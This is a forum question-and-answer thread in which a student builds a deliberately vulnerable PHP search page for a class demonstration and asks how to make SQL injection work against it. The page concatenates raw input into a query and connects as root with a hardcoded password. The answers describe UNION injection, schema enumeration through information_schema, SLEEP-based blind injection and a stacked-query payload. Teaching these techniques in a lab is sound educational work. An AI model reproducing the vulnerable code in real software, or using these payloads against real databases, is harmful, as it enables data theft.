can't sql inject my code

Question

I'm writing a demo webpage to show SQL injection techniques for a class project. I'm almost sure it's horribly coded in the right way, but I'm having trouble getting the actual injection to work. The code is supposed to take input from an HTML textbox and check a table called "stock" and output the results, if any. Here is the relevant section of the code:

<?php
//connect to db
    $con = @mysql_connect('localhost','root','Secure') or die('Failed.');
    mysql_select_db('test', $con) or die('Could not select database.');
?>

<!-- <div>Text box, takes user input for a search</div>-->
<div class="center">
<form action="index.php" method="post">
    <p>Search: <input type="text" name="lookup" placeholder="Whatchu tryna find?"></p>
    <br>
    <p class= button ><input type="submit" name="search" value="search" size="100"></p>
</form>
</div>
<!-- <div>End of HTML code</div>-->

<?php

//Check if there is input, then put it in a variable called $search
if(isset($_POST['lookup'])){
        $search = $_POST['lookup'];
        if(empty($search)){
            echo "Fill in all the fields";
            exit();
        }
    }
//Query statement, held by $query
$query = mysql_query("SELECT * FROM `stock` WHERE `Name` LIKE '%$search%'");

//Take results from $query, output them
while ($list = mysql_fetch_assoc($query)){

echo 'Item: ' . $list['Name'] . '<br>';
echo 'Price: $' . $list['Price'] . '<br>';
echo 'Stock: ' . $list['Quantity'] . '<br>';
}
 ?>

I can successfully search the 'stock' table, and I can output everything in the table by searching for % or by entering http://localhost/index.php?search=hammer%20OR%201=1 into the browser. But that's all I can do so far.

Is there anything I can change in this code to make SQLi easier? Or is something wrong with my SQLi technique? It doesn't matter where the injection happens, from the textbox or the address bar, as long as I can show multiple techniques. I can dump the table from the address bar, but I'd like to show the sleep() function get used as well as navigate to and dump info from other tables, even other databases within my server. But I'm having trouble figuring out how to do that.

Finally, are there any kiddie scripts or programs anyone knows of for SQLi I can run against my localhost site? I still need to demonstrate manual techniques but I thought it might be good to show the class how fast a proper tool can attack a vulnerable site. Obviously I will only use this on my project because I don't want to go to jail.

Edit: The post How can I prevent SQL injection in PHP? was linked, and it seems quite detailed but not quite what I'm looking for since I need to know how to break the website, not fix it. The issue does indeed seem to be with my SQLi technique.

Answer 1

The most common techniques for MySQL injection are:

1. Abuse UNION to turn a query on one table into a query on any table or value, e.g.

   SELECT * FROM `stock` WHERE `Name` LIKE '' AND 0 UNION SELECT 
       DATABASE(), VERSION(), USER()
   -- '
   

   The bolded portion represents the injected content.

2. Use the information_schema database to fetch metadata, like the names of tables and columns, e.g.

   SELECT TABLE_NAME FROM information_schema.tables
       WHERE TABLE_SCHEMA = 'my_database'
   
   SELECT COLUMN_NAME FROM information_schema.columns
       WHERE TABLE_SCHEMA = 'my_database' AND TABLE_NAME = 'a_table'
   

3. If your injection does not display any results, use the SLEEP() function to make true/false queries, like:

   SELECT SLEEP(2) FROM some_table WHERE id = 1 AND value LIKE 'a%' LIMIT 1
   

   This will sleep for two second if the column with ID 1 has a value which starts with "a", or return immediately otherwise. You can use a series of these queries to slowly guess the contents of a row. (For example: Does it start with "a"? NO. Does it start with "b"? YES. Does it start with "ba"?… etc.)

   This technique is known as blind SQL injection.

Answer 2

Try this in search field : '; some query here; #